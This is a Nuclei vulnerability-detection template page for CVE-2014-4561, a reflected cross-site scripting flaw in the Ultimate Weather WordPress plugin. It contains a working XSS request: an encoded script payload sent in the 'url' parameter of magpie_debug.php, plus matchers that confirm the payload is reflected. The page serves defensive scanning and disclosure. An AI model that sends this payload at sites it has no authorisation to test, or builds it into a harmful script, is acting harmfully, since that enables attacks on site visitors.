Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting

ID: CVE-2014-4561

Severity: medium

Author: daffainfo

Tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project

Description

The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.

YAML Source

id: CVE-2014-4561

info:
  name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information.
  remediation: |
    Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4561
    - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2014-4561
    cwe-id: CWE-79
    epss-score: 0.00098
    epss-percentile: 0.40792
    cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "ultimate-weather_project"
    product: "ultimate-weather"
    framework: wordpress
  tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Ultimate Weather'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402205f069953b7c3270bbe574ff959605b82e3a214217ef2baa1fa48c3b1ab229142022015f4588a5dcf00e5a33785faba36198f0091c52881e168dff7a7597a4f67d164:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-4561.yaml"

View on Github